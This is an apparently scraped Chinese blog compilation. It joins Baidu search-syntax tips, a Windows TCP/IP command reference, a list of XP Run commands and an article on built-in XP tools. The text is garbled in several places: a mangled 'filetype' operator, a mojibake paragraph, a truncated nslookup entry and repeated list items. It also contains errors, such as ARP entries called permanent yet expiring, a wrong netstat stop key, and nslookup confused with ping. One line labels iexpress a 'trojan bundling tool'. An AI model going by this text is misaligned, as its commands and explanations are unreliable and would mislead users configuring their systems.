(A | B)”:或者含A或者含B,引号可省略;
"AB"”:包含AB完整关键词;
A intitle:B”:网页标题含B,页面含A;
A inurl:B”:链接中含B,内容含A;
A file无效:B”:在B类型文件中搜索A,文件类型可以为DOC、PDF、XLS等等;

   
下面我们举例逐一说明上面这些语法的用途:

实例4:我要下载周星驰的壁纸

分析:如果直接用“周星驰 壁纸”搜索,会发现前面的都是《功夫》壁纸,但我只要星星以前的壁纸!

操作:用关键词“周星驰 壁纸 – 功夫”搜索即可!
备注:减号必须是英文输入法的“-”,而且前一个关键词和减号之间必须有空格,减号和后一个关键词之间,有无空格均可。用这个方法可以过滤不需要的内容,从而提高了搜索的效率!

实例5:我想找AC米兰或者尤文图斯的新闻和资料

分析:你可以单独搜索AC米兰和尤文图斯,但用语法可以更快实现同样的效果。

操作:用关键词“AC米兰 | 尤文图斯”搜索即可!
备注:和前面的相反,这个语法的作用是扩大搜索范围!

实例6:怎么样才可以查找别人的收藏夹?

分析:许多人会把自己的收藏夹导出并放在网上,一般把网页命名为bookmarks,利用这一点我们可以将其找出来!


操作:用关键词:“论坛 bookmarks intitle:bookmarks”或“网站 bookmarks intitle:bookmarks
备注:搜索网页标题也是一个很有用的功能,有时候搜索页面范围太大时就可以改用搜索标题!

实例7:我要找毕业论文或者报告!

分析:
这个是许多人会碰到的问题,如果用“论文 下载”得到的结果太多了,而且有的还是收费的。我们注意到网上许多论文都是以doc文件保存,报告或资料用pdf文件保存等。这样,利用文件类型搜索语法效果就非常好了!

操作:用关键词:“毕业论文 file无效:doc”或者“报告 file无效:pdf
备注:这样搜索出来结果前面都有一个文件标记,说明文件是什么类型的,点击即可直接下载!如果要看html版的,可点击下面的“HTML版”字样!








   
如果你记不住那么多搜索语法,你可以点击进入百度首页的“高级搜索”界面,里面的各种选项可逐一对应上面提到的搜索语法。





四.其它技巧:

    除了上面的基本搜索语法外,还有其它一些很实用的技巧。熟练地掌握这些技巧可以更大限度地发挥搜索引擎的作用,同时也可以达到更多更实用的效果。

    1.如果百度mp3搜索里找不到你要的歌曲,可以在网页搜索里用“歌名 歌手 名 mp3”来搜索;

    2.找MTV、电影可以在mp3搜索里找:

实例8:我想找韩国感人MTV《Kiss》的下载地址

分析:如果直接在网页里搜索,可以找到许多结果,不过许多都是在线看的,或者链接都失效了。

操作:在百度mp3搜索里用“kiss”搜索,找到10M左右大小的rm或者asf文件,直接下载就可以了。
备注:利用这个方法有时候竟然还可以找到电影和小短片的下载地址哦,惊!

   
3.如果你拿不准某个人名、地名或者其它词语的正确写法,可以使用拼音输入,如"likui",百度将提示,您要找的是不是: "李逵";

   4.如果你输入的拼写有误,百度可以自动纠错,比如当您输入"陶哲",百度将提示,您要找的是不是: "陶喆";

   
5.在百度mp3歌词搜索里可以查找歌曲名称;

实例9:我听到一首歌,里面有一句“其实我很在乎你”,我想知道这首歌和歌手的名字?

分析:在百度mp3歌词搜索里输入部分歌词内容,即可找到完整的歌曲信息

操作:切换到百度mp3搜索,在搜索框里输入“其实我很在乎你”,然后选中歌词,搜索即可得到这首歌是王袁在《我不做人造美女》专辑里的《其实我很在乎你》
备注:该法对于找歌特别有效,不过英文的歌不是太好找,因为缺少许多英文歌词。

   
6.在百度常用搜索(http://www.baidu.com/life/)里可以快速查找各种实用查询,如:天气预报、电视预告、火车车次、航班班次、常用电话、文档搜索、手机号码、股票信息、计算器、度量转换、英语辞典、IP地址、地区区号、邮政编码、政府机构、交通处罚、消费者维权、万年历、历史上的今天、世界之最、成语字典、科技辞典、英汉互译、外汇牌价等;

    7.对于猜谜、填词、对联、事物之间的关系、历史上的今天、各种信息查询等,选择好合适的关键词后搜索一下,很快就可以得到结果!

    8.更换同义关键词可以得到不同的搜索结果,比如“四六级”与“46级”、“”与“cat;另外,对于小说、电影,搜索的时候最好加上书名号"《》"来减小搜索范围。

   
类似的小技巧在这里不多列举,大家可以通过下面这些资料和链接获取更多的搜索技巧:

   
百度搜索帮助 http://www.baidu.com/search/jiqiao.html
   
百度帮助电子书下载 http://www.baidu.com/search/BaiduHelpBook.chm

  
中文搜索引擎指南网 http://www.sowang.com/
  
百度搜索引擎入门到精通 http://www.sowang.com/search/china/baidu.htm
   Google搜索引擎入门到精通 http://www.sowang.com/search/china/Google.htm

   Google搜索从入门到精通v4.0 http://www.tallboythinboy.com/article/google_skills.htm

五.其它

    除了专业的如百度、Google等搜索引擎外,许多网站和论坛都有自己的搜索工具,比如各大门户网站以及许多软件下载站和论坛等。

    如太平洋下载中心:

   


   
天空软件下载站:

 


猫扑论坛也有自己的搜索功能:

   

  
  和搜索引擎不同的是,这些站内搜索功能只针对本站的信息进行分类搜索和特色查询,比如猫扑大杂烩提供按发言人和标题查找,充分利用这些搜索功能同样可以快速找到自己想要的内容。在这里需要提醒的是,以后大家发帖子前最好先搜索一下,看是否有人发表过相同的内容,尽量避免重复发表帖子。

   
另外,除了在web上搜索,还有各种搜索工具和浏览器搜索工具栏,比如百度搜霸、Google ToolBar等,各种非IE浏览器都带有方便的搜索工具栏:

   
Maxthon:

   

    GreenBrowser:

 

  
利用这些快速搜索工具可以方便地搜索和切换搜索引擎!

   关于搜索,就说这么多了。俗话说,生活就是与人沟通的技巧,那也可以说,上网就是搜索的技巧。掌握必要的搜索技巧是对每个人的基本要求,因为我们每个人以后的学习和工作都与网络密不可分。熟练地应用搜索引擎可以使工作事半功倍,给自己带来巨大的便利。

    罗马不是一天建成的,搜索也不是一时半会儿就可以学会的,希望大家在平时多多积累经验和技巧,have a good luck!
 
附录:一些吐血推荐的网址!

电子书搜索引擎:http://book.httpcn.com/search/
可以方便地搜索电子书(ebook)

BT特工:http://bt.souyo.com/
BT种子搜索引擎,号称互联网上最快的BT种子搜索工具

电影搜索引擎:http://www.sowang.com/search_chinese.htm
可以搜索大量电影及电视直播

FTP星空搜索:http://www.sheenk.com/ftpsearch/search.html
FTP搜索引擎

中国搜索:http://www.zhongsou.com/
北大天网:http://e.pku.edu.cn/
VeryCD主页:http://www.verycd.com/
Sogou主页:http://www.sogou.com
英文字体搜索引擎:http://www.myfonts.com/
论坛搜索引擎-帖易:http://www.teein.com/
搜游-游戏搜索引擎:http://www.souyo.com/

中国Web信息博物馆 http://www.infomall.cn/

顾名思义,在这里可以回顾网站过去是什么样子的,比如你知道网易在2002年的主页界面是什么样的么?来这里搜一下就行了。

http://www.udiab.com
嘿嘿,看到这个页面你是不是以为显示器出问题了?百度的首页都颠倒过来了。

http://www.alltooflat.com/geeky/elgoog
Google的也有哦!

2005年08月03日




一、
Arp: 显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表。该命令只有在安装了 TCP/IP 协议之后才可使用

arp -a [inet_addr] [-N [if_addr]]

arp -d inet_addr [if_addr]

arp -s inet_addr ether_addr [if_addr]

参数

-a 通过询问 TCP/IP 显示当前 ARP 项。如果指定了 inet_addr,则只显示指定计算机的 IP 和物理地址。

-g 与 -a 相同。

inet_addr 以加点的十进制标记指定 IP 地址。

-N 显示由 if_addr 指定的网络界面 ARP 项。

if_addr 指定需要修改其地址转换表接口的 IP 地址(如果有的话)。如果不存在,将使用第一个可适用的接口。

-d 删除由 inet_addr 指定的项。

-s 在 ARP 缓存中添加项,将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的 6 个十六进制字节给定。使用带点的十进制标记指定IP地址。项是永久性的,即在超时到期后项自动从缓存删除。

ether_addr 指定物理地址。

二、

Finger 在运行 Finger 服务的指定系统上显示有关用户的信息。根据远程系统输出不同的变量。该命令只有在安装了 TCP/IP 协议之后才可用。

finger [-l] [user]@computer[...]

参数

-l 以长列表格式显示信息。

user 指定要获得相关信息的用户。省略用户参数以显示指定计算机上所有用户的信息:

@computer

三、

Ftp 将文件传送到正在运行 FTP 服务的远程计算机或从正在运行 FTP 服务的远程计算机传送文件(有时称作 daemon)。Ftp 可以交互使用。单击“相关主题”列表中的“ftp 命令”以获得可用的“ftp”子命令描述。该命令只有在安装了 TCP/IP 协议之后才可用。Ftp 是一种服务,一旦启动,将创建在其中可以使用 ftp 命令的子环境,通过键入 quit 子命令可以从子环境返回到 Windows 2000 命令提示符。当ftp 子环境运行时,它由 ftp 命令提示符代表。

ftp [-v] [-n] [-i] [-d] [-g] [-s:filename] [-a] [-w:windowsize] [computer]

参数

-v 禁止显示远程服务器响应。

-n 禁止自动登录到初始连接。

-i 多个文件传送时关闭交互提示。

-d 启用调试、显示在客户端和服务器之间传递的所有 ftp 命令。

-g 禁用文件名组,它允许在本地文件和路径名中使用通配符字符(* 和 ?)。(请参阅

联机“命令参考”中的 glob 命令。)

-s: filename 指定包含 ftp 命令的文本文件;当 ftp 启动后,这些命令将自动运行。该参数中不允许有空格。使用该开关而不是重定向 (>。

 

-a 在捆绑数据连接时使用任何本地接口。

-w:windowsize 替代默认大小为 4096 的传送缓冲区。


computer 指定要连接到远程计算机的计算机名或 IP 地址。如果指定,计算机必须是行的最

后一个参数。

四、

Nbtstat 该诊断命令使用 NBT(TCP/IP 上的 NetBIOS)显示协议统计和当前 TCP/IP 连接。该命令只有在安装了 TCP/IP 协议之后才可用。

nbtstat [-a remotename] [-A IP address] [-c] [-n] [-R] [-r] [-S] [-s] [interval]

参数

-a remotename 使用远程计算机的名称列出其名称表。

-A IP address 使用远程计算机的 IP 地址并列出名称表。

-c 给定每个名称的 IP 地址并列出 NetBIOS 名称缓存的内容。

-n 列出本地 NetBIOS 名称。“已注册”表明该名称已被广播 (Bnode) 或者 WINS(其他节点类型)注册。

-R 清除 NetBIOS 名称缓存中的所有名称后,重新装入 Lmhosts 文件。

-r 列出 Windows 网络名称解析的名称解析统计。在配置使用 WINS 的 Windows2000 计算机上,此选项返回要通过广播或 WINS 来解析和注册的名称数。

-S 显示客户端和服务器会话,只通过 IP 地址列出远程计算机。

-s 显示客户端和服务器会话。尝试将远程计算机 IP 地址转换成使用主机文件的名称。

interval 重新显示选中的统计,在每个显示之间暂停 interval 秒。按 CTRL+C 停止重新显示统计信息。如果省略该参数,nbtstat 打印一次当前的配置信息。
五、

Netstat 显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后才可以使用。

netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval]

参数

-a 显示所有连接和侦听端口。服务器连接通常不显示。

-e 显示以太网统计。该参数可以与 -s 选项结合使用。

-n 以数字格式显示地址和端口号(而不是尝试查找名称)。

-s 显示每个协议的统计。默认情况下,显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。

-p protocol 显示由 protocol 指定的协议的连接;protocol 可以是 tcp 或 udp。如果与 -s选项一同使用显示每个协议的统计,protocol 可以是 tcp、udp、icmp 或ip。

-r 显示路由表的内容。

interval 重新显示所选的统计,在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统计。如果省略该参数,netstat 将打印一次当前的配置信息。

六、

Ping 验证与远程计算机的连接。该命令只有在安装了 TCP/IP 协议后才可以使用。

ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [-k computer-list]] [-w timeout] destination-list

参数

-t Ping 指定的计算机直到中断。 -a 将地址解析为计算机名。

-n count 发送 count 指定的 ECHO 数据包数。默认值为 4。

-l length 发送包含由 length 指定的数据量的 ECHO 数据包。默认为 32 字节;最大值是65,527。

-f 在数据包中发送“不要分段”标志。数据包就不会被路由上的网关分段。

-i ttl 将“生存时间”字段设置为 ttl 指定的值。

-v tos 将“服务类型”字段设置为 tos 指定的值。

-r count 在“记录路由”字段中记录传出和返回数据包的路由。count 可以指定最少 1 台,

最多 9 台计算机。

-s count 指定 count 指定的跃点数的时间戳。

-j computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔(路由稀疏源)IP 允许的最大数量为 9。

-k computer-list 利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔(路由严格源)IP 允许的最大数量为 9。

-w timeout 指定超时间隔,单位为毫秒。

destination-list 指定要 ping 的远程计算机。

七、

Rcp 在 Windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制件。rcp 命令是一个连接命令,从 Windows 2000 计算机发出该命令时,也可以用于其他传输在两台运行 rshd 的计算机之间复制文件。rshd 端口监控程序可以在 UNIX 计算机上使用,而在 Windows 2000 上不能使用,所以 Windows 2000 计算机仅可以作为发出命令的系统参与。远程计算机必须也通过运行 rshd 提供rcp 实用程序。

rcp [-a | -b] [-h] [-r] source1 source2 … sourceN destination

参数

-a 指定 ASCII 传输模式。此模式在传出文件上将回车/换行符转换为回车符,在传入文件中将换行符转换为回车/换行符。该模式为默认的传输模式。 -b 指定二进制图像传输模式。没有执行回车/换行符转换。

-h 传输 Windows 2000 计算机上标记为隐藏属性的源文件。如果没有该选项,在rcp 命令行上指定隐藏文件的效果与文件不存在一样。

-r 将源的所有子目录内容递归复制到目标。source 和 destination 都必须是目录,虽然即使源不是目录,使用 -r 也能够工作。但将没有递归。

source 和 destination

格式必须为 [computer[.user]:]filename。如果忽略了 [computer[.user]:] 部分,计算机将假定为本地计算机。如果省略了 [.user] 部分,将使用当前登录的 Windows 2000 用户名。如果使用了完全合格的计算机名,其中包含句点 (.) 分隔符,则必须包含 [.user]。否则,计算机名的最后部分将解释为用户名。如果指定了多个源文件,则 destination 必须是目录。

如果文件名不是以 UNIX 的正斜杠 (/) 或 Windows 2000 系统的反斜杠 () 打头,则假定相对于当前的工作目录。在 Windows 2000 中,这是发出命令的目录。在远程系统中,这是远程用户的登录目录。句点 (.) 表示当前的目录。在远程路径中使用转义字符(、" 或 ‘),以便在远程计算机中使用通配符。

八、

Rexec 在运行 REXEC 服务的远程计算机上运行命令。rexec 命令在执行指定命令前,验证远程计算机上的用户名,只有安装了 TCP/IP 协议后才可以使用该命令。

rexec computer [-l username] [-n] command

参数

computer 指定要运行 command 的远程计算机。

-l username 指定远程计算机上的用户名。

-n 将 rexec 的输入重定向到 NULL。

command 指定要运行的命令。

九、

Route 控制网络路由表。该命令只有在安装了 TCP/IP 协议后才可以使用。

route [-f] [-p] [command [destination] [mask subnetmask] [gateway] [metric costmetric]]

参数

-f 清除所有网关入口的路由表。如果该参数与某个命令组合使用,路由表将在运行命令前清除。

-p 该参数与 add 命令一起使用时,将使路由在系统引导程序之间持久存在。默认情况下,系统重新启动时不保留路由。与 print 命令一起使用时,显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。

command 指定下列的一个命令。

命令目的 print 打印路由

add 添加路由

delete 删除路由

change 更改现存路由

destination 指定发送 command 的计算机。 mask subnetmask 指定与该路由条目关联的子网掩码。如果没有指定,将使用 255.255.255.255。

gateway 指定网关。

名为 Networks 的网络数据库文件和名为 Hosts 的计算机名数据库文件中均引用全部 destination 或 gateway 使用的符号名称。如果命令是 print 或 delete,目标和网关还可以使用通配符,也可以省略网关参数。

metric costmetric 指派整数跃点数(从 1 到 9999)在计算最快速、最可靠和(或)最便宜的

路由时使用。



cmd.exe—————–DOS命令提示符
regedit.exe————–注册表
gpedit.msc—————组策略
Msconfig.exe————-系统配置实用程序
services.msc————–本地服务设置
regsvr32 /u zipfldr.dll—-屏蔽XP的ZIP解压功能
regsvr32 zipfldr.dll —— 开启XP的ZIP解压功能
regsvr32 /u *.dll———-停止dll文件运行
iexplore -channelband —收藏夹
netstat -na ————— 查看打开的端口
chkntfs /t:0 ————– 设置开机时磁盘检查的等待时间为0
ipconfig /all————– 查看本机IP及网关等
winchat——–XP自带局域网聊天
dxdiag———检查DirectX信息
drwtsn32—— 系统医生
devmgmt.msc— 设备管理器
notepad——–打开记事本
dfrg.msc——-磁盘碎片整理程序
diskmgmt.msc—磁盘管理实用程序
calc———–启动计算器
chkdsk.exe—–Chkdsk磁盘检查
drwtsn32—— 系统医生
winmsd———系统信息
sfc /scannow—扫描错误并复原
taskmgr——–任务管理器(2000/xp/2003)
net stop messenger—-停止信使服务
net start messenger—开始信使服务
oobe/msoobe /a——–检查XP是否激活
rsop.msc——-组策略结果集
regedt32——-注册表编辑器
rononce -p —-15秒关机
chkdsk.exe—–Chkdsk磁盘检查
certmgr.msc—-证书管理实用程序
calc———–启动计算器
charmap——–启动字符映射表
cliconfg——-SQL SERVER 客户端网络实用程序
Clipbrd——–剪贴板查看器
conf———–启动netmeeting
compmgmt.msc—计算机管理
cleanmgr——-垃圾整理
ciadv.msc——索引服务程序
osk————打开屏幕键盘
odbcad32——-ODBC数据源管理器
lusrmgr.msc—-本机用户和组
logoff———注销命令
iexpress——-木马捆绑工具,系统自带
Nslookup——-IP地址侦测器
fsmgmt.msc—–共享文件夹管理器
utilman——–辅助工具管理器
control userpasswords2—— 设置XP自动登录
dcomcnfg——-打开系统组件服务
ddeshare——-打开DDE共享设置
dvdplay——–DVD播放器
sndrec32——-录音机
Nslookup——-IP地址侦测器
explorer——-打开资源管理器
logoff———注销命令
tsshutdn——-60秒倒计时关机命令
lusrmgr.msc—-本机用户和组
cleanmgr——-垃圾整理
compmgmt.msc—计算机管理conf———–启动 netmeeting
dvdplay——–DVD播放器
charmap——–启动字符映射表
diskmgmt.msc—磁盘管理实用程序
dfrg.msc——-磁盘碎片整理程序
devmgmt.msc— 设备管理器
rononce -p —-15秒关机
rsop.msc——-组策略结果集
mem.exe——–显示内存使用情况
progman——–程序管理器
perfmon.msc—-计算机性能监测程序
winver———检查Windows版本
wmimgmt.msc—-打开windows管理体系结构(WMI)
wupdmgr——–windows更新程序
wscript——–windows脚本宿主设置
write———-写字板
winmsd———系统信息
wiaacmgr——-扫描仪和照相机向导
mplayer2——-简易widnows media player
mspaint——–画图板
mstsc———-远程桌面连接
mplayer2——-媒体播放机
magnify——–放大镜实用程序
mmc————打开控制台
mobsync——–同步命令
nslookup——-网络管理的工具向导
ntbackup——-系统备份和还原
narrator——-屏幕“讲述人”
ntmsmgr.msc—-移动存储管理器
ntmsoprq.msc—移动存储管理员操作请求
syncapp——–创建一个公文包
sysedit——–系统配置编辑器



Windows XP现在大家都在用了,不过,隐藏在它其中的秘密武器可不是人人都找得到,下面就让我带大家来寻找Win XP中的28个秘密武器。

1、免费的系统教程(system32文件夹下)
安装完windows xp后很想马上学习并体验一下它的魅力吗?我们无需再东奔西走去找烦人的文字教材。只要选择“开始”→“ 漫游windows xp”,就会出现界面,它将引导我们游历windows xp的新功能。
  
小提示:windows xp中自带的教程非常形象,是图形界面的,而且制作得相当精美,微软的权威性可想而知。如果你的“开始”菜单上没有“漫游windows xp”项目,则可以运行c:\windows\system32\tourstart.exe进入。

2、辅助功能向导——Accwiz(system32文件夹下)
我们知道,微软在windows中为残疾人士提供了辅助功能,使他们也能xx作计算机。该程序可以根据用户的视觉、听力和行动来配置我们的windows,使残疾人士能根据自身情况更好地使用windows。
  
3、字符映射表——Charmap(system32文件夹)
是不是觉得word的“插入符号”功能非常方便?我们在其他windows程序中也常常要插入一些特殊符号,而一个个地找又麻烦,这时可使用“字符映射表”程序帮忙。通过“字符映射表”可查看选定字体中有哪些字符,选中后单击“选定”和“复制”按钮,即可把选定字符复制到windows剪贴板中,供字处理软件粘贴使用。
  
小提示:用它来复制特殊字体中的特殊符号特别有用。

4、仓颉拼音输入法——Cintsetp(system32\ime\cintlgnt文件夹下)
微软新仓颉输入法98b的安装程序,微软把它放在简体中文版windows xp中,但埋藏得较深。不过它很有用,安装后就会在windows中新增一个“中文(台湾)”的仓颉输入法,利用它可以在简体中文windows xp上通过输入繁体汉字。这对于从中国港澳台地区至内地工作的人提供了方便。

5、磁盘清理大师——Cleanmgr(system32文件夹下)
尽管现在的硬盘越来越大,但它总有容量的限制。在你不经意地安装这个或那个软件的过程中,可能会因为硬盘空间已频频告急而影响了正常windows程序的执行。不要急,请打开此程序,它会自动地释放出一部分硬盘空间,并会智能化地进行删除xx作,保证你的系统万无一失。这比从资源管理器中删除要安全多了。
  
6、剪贴板查看器——Clipbrd(system32文件夹下)
windows剪贴板为我们在各个windows程序间的信息交流提供了一个桥梁。但这部分数据一般情况下无法看到。不过,使用剪贴板查看器就可看到当前剪贴板中的“新大陆”。windows xp中的剪贴板查看器程序较原先windows 9x/me的旧版本多出了共享功能,通过设置权限允许其他网上用户将该剪贴板装入使用。

7、控制面板启动器——Control.exe(system32文件夹下)
控制面板是windows的一个重要组成部分,许多设置都通过他完成。而双击这个文件就是最快打开系统控制面板的方法,可省去从“开始”菜单上层层点击的麻烦。
  
8、Windows xp的诊断医生——Drwtsn32(system32文件夹下)
drwtsn32是一个程序错误调试器。drwatson程序会获得并记录运行windows的计算机上的程序错误的信息。只要检测到错误,就会创建一个文本文件drwtsn32.log),提供错误原因的详细说明,并给出解决问题的建议性xx作,在与microsoft技术支持联系并请求帮助时,drwatson将会起到很大作用。

9、DVD播放器——Dvdplay(system32文件夹下)
随着dvd驱动器和dvd光盘价格的下降,在普通家庭电脑上配置一个dvd播放器已不是一件奢侈的事情。而要播放dvd需要播放器的支持,windows xp提供了一个“免费”的dvd播放器,有了它我们可以省去一笔购买第三方dvd播放软件的费用。

10、自解压文件制作工具——Iexpress(system32文件夹下)
用过压缩软件的读者一定对自解压文件不陌生,自解压文件可在没有相应解压缩程序的情况下直接将压缩包文件解压缩到相应的文件夹下,极大地方便了用户。利用iexpress可制作两种自解压文件,一种是标准自解压文件(standard
self-extractor),另一种是安装程序式自解压文件(self-extractor for
software installation),这样我们在发布程序时就方便多了。另外大家要注意,尽管使用iexpress的运行界面是英文的,但利用它生成的自解压文件却是中文的,省去了繁琐的本地化工作。
  
11、文件转移向导——Migwiz(system32\usmt文件夹下)
windows系统的易用性总是和不稳定性共存的,因此在系统健康之时把当前设置保存下来,供系统崩溃后重新安装时使用是个不错的主意。微软已把这个工具集成到“文件和设置转移向导”程序上。通过它,我们就可以实现系统状态的备份与恢复。
  
12、系统配置程序——Msconfig(windows\pchealth\helpctr\binaries文件夹下)和windows中的系统配置程序一样,通过这个程序,我们可对系统的一般、system.ini、win.ini、boot.ini、服务和启动项目进行修改。
  
小提示:用它来去除系统自启动程序特别有效。

13、备份工具——Ntbackup(system32文件夹下)
数据是计算机中最为宝贵的资料,因此经常备份你的资料也应该成为一个好习惯。现在许多人都寻求第三方的备份工具,其实大可不必。使用windows xp中内置的备份工具就可以非常方便地将资料进行备份,而且由于你使用的是微软产品,所以根本不存在兼容性问题。
 
14、ODBC数据源管理器——Odbcad32(system32文件夹下)
在windows中访问odbc数据源必须要有其驱动程序,该工具可以查看在windows中已安装的驱动程序及相关信息。

15、IP地址侦测器——Nslookup(system32文件夹下)
在联入互联网的每台电脑都有一个ip地址,同样,每个网站也有它的ip地址,而且是唯一的。通过这个ip侦测工具ping就可以轻而易举地得到它们的真正ip地址。如笔者要想知http://www.xxx.com的ip地址,…s窗?..x.com即可看到。

16、屏幕键盘——Osk(system32文件夹下)
屏幕键盘是一种实用ぞ撸谄聊簧舷允拘槟饧蹋市砟切┯幸贫习挠没в弥刚肷璞富蛴蜗犯耸淙胧荨F聊患讨荚谖嬖谝贫习挠没峁┳畹图侗鸬墓δ堋U舛杂诓恢廊绾渭氲挠没б埠苡杏谩K箍梢杂糜谧罨镜腸ai键盘教学。

17、对象包装程序——Packager(system32文件夹下)
通过对象包装程序我们可以打开一个文件,并引入其中的图标,将它们插入到一般windows程序中使用,可用于制作计算机类教学课件或文档。
  
18、注册表编辑器增强版——Regedit32(system32文件夹下)
注册表编辑器是用来更改系统注册表设置的高级工具。注册表中包含了有关计算机如何运行的信息。在windows xp中有一个名为regedit的程序,可编辑注册表,但此程序却是它的增强版本,除可编辑注册表外,还可设置权限、清除重复项、删除已被卸载或删除的程序项等高级xx作。
  
19、Activex注册和反注册工具——Regsvr32
使用过activex的人都知道,activex不注册是不能够被系统识别和使用的,一般安装程序都会自动地把它所使用的activex控件注册,但如果你拿到的一个控件需要手动注册怎么办呢?如果修改注册表那就太麻烦了,在windows的system文件夹下有一个regsvr32.exe的程序,它就是windows自带的activex注册和反注册工具。它的用法为:“regsvr32 [/s] [/n] [/i(:cmdline)] dllname”。其中dllname为activex控件文件名,建议在安装前拷贝到system文件夹下。

参数有如下意义:
/u——反注册控件
/s——不管注册成功与否,均不显示提示框
/c——控制台输出
/i——跳过控件的选项进行安装(与注册不同)
/n——不注册控件,此选项必须与/i选项一起使用
如笔者要注册一amovie.ocx控件,则打入regsvr32 amovie.ocx即可,要反注册它时只需使用regsvr32 /u amovie.ocx就行了。

20、动态链接库函数启动器——Rundll32
在windows中使用了许多动态链接库,这样就使得所有windows程序都可共享这些动态链接库中的函数。一般情况下,许多应用程序都通过windows api来xx作这些函数,但归根结底是通过windows文件夹下的rundll32.exe程序来启动相应的函数。它的用法是:“rundll32.exe 动态链接库名,函数名,参数名”。如笔者需要实现一键关机,则在桌面上建立一快捷方式,命令行为“rundll32.exe user.exe,exitwindows”,并设置其快捷键为f4即可。再如,笔者要打开控制面板,则只需要输入命令“rundll32.exe shell32.dll,control_rundll”即可,要打开桌面属性,只需要使用“rundll32.exe shell32.dll,control_rundll desk.cpl”,其余的以此类推。

21、系统文件检查器——Sfc(system32文件夹下)
使用windows难免不会出现系统文件损坏或丢失的毛病,而如果为了几个小小的文件就去重装系统,又显得稍微麻烦了一些。通过系统文件检查器sfc.exe,一切都会变得非常简单。
  
22、共享文件夹设置工具——Shrpubw(system32文件夹下)
同一工作组的同事在一起工作,有时必须与同事们共享文件夹,这时我们可以利用此工具轻松搞定。它的作用与右击一文件夹,选择“共享”基本上等价。
  
23、Microsoft 签字验证工具——Sigverif(system32文件夹下)
所谓“签署的文件”,就是被授予microsoft数字签署的文件。该签署表明,该文件是原始文件的一模一样的副本。通过microsoft签字验证工具,我们可在计算机上查找已签署和未签署的文件,也可查看签署文件的身份验证,以确认该文件还没有被篡改。使用起来非常方便,和查找窗口几乎没有什么不同,只要给出搜索范围,就可搜索出指定范围内的已签署文件和未签署文件。

24、音量控制程序——Sndvol32
我们在windows任务栏上可见到一个可爱的小喇叭,当我们双击它时就会弹出音量控制面板,其实这时我们就是启动了一个windows文件夹下的sndvol32.exe文件。不信,请你进入windows文件夹,再打开sndvol32.exe文件看看,熟悉的“音量控制”面板是否已经在你眼前了?另外还要告诉大家,它还有一个隐藏的参数“/r”,利用此参数可快速地打开录音控制面板,这样我们只要在桌面上建立一指向c:\windows\sndvol32.exe的快捷方式,并令它的参数为/r(即在目标中填入“c:\windows\sndvol32.exe /r”),就可以快速打开录音控制面板选择输入设备了。如果设备过多,在面板上容纳不下时,试着按“ctrl+s”键,不管有多少设备都能够完全显示。

25、任务管理器——Taskmgr(system32文件夹下)
任务管理器提供正在你的计算机上运行的程序和进程的相关信息,使用任务管理器可快速查看正在运行的程序的状态,或终止已停止响应的程序。也可使用多达15个的参数评估正在运行的进程的活动,以及查看cpu和内存使用情况的图形和数据。当计算机发生锁死时使用它最方便和有效。

26、远程连接程序——Telnet(system32文件夹下)
在internet上有无数的计算机,而要访问它们都必须通过建立远程连接才行,进行两个计算机的远程连接可用专门软件实现,但通过windows自带的远程连接程序telnet.exe也能完成这一xx作,而且它还是纯中文界面软件。

27、远程FTP工具——Tftp(system32文件夹下)
ftp是一个网络传输的协议,通过这个程序可非常方便地连接到对方的服务器上进行文件的存取xx作,省得再找如第三方的ftp软件了,可惜的是它是字符界面。
  
28、Windows升级程序——Wupdmgr(system32文件夹下)
安装完windows后,在开始菜单的上方会有windows update菜单项,通过它能自动登录到microsoft公司的网站上完成自己windows的升级工作。但时间一长,可能会把这个快捷方式误删除了,这时我们就可以通过打开windows下的wupdmgr.exe文件来完成这个功能。
  
Windows xp实为一个功能强大的*作系统,但只有充分地发挥其内置功能,才能更好地使用它。这也符合“基础的未必是最坏的,回到基础还是好的”的道理